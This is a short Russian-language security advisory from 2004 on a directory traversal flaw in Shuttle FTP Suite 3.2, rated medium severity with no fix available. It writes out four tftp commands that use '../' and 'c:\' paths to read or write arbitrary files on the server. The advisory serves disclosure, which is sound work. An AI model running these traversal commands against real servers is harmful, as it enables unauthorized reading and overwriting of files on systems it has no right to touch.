Удаленный доступ к произвольным файлам в Shuttle FTP Suite

Дата публикации:
12.08.2004
Всего просмотров:
672
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Shuttle FTP Suite 3.x
Уязвимые версии: Shuttle FTP Suite 3.2

Описание: Уязвимость обхода каталога обнаружена в Shuttle FTP Suite. Удаленный пользователь может читать и записывать файлы на целевой системе.

Удаленный пользователь может использовать сдедующие tftp команды чтобы записывать или читать произвольные файлы:

 tftp -i [Server_IP] PUT [FileName] ../[FileName]
tftp -i [Server_IP] PUT [FileName] c:\[FileName]
tftp -i [Server_IP] GET ../[FileName]
tftp -i [Server_IP] GET c:\[FileName]

URL производителя: http://www.waveflow.com/shuttleftp/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Shuttle FTP Suite

или введите имя

CAPTCHA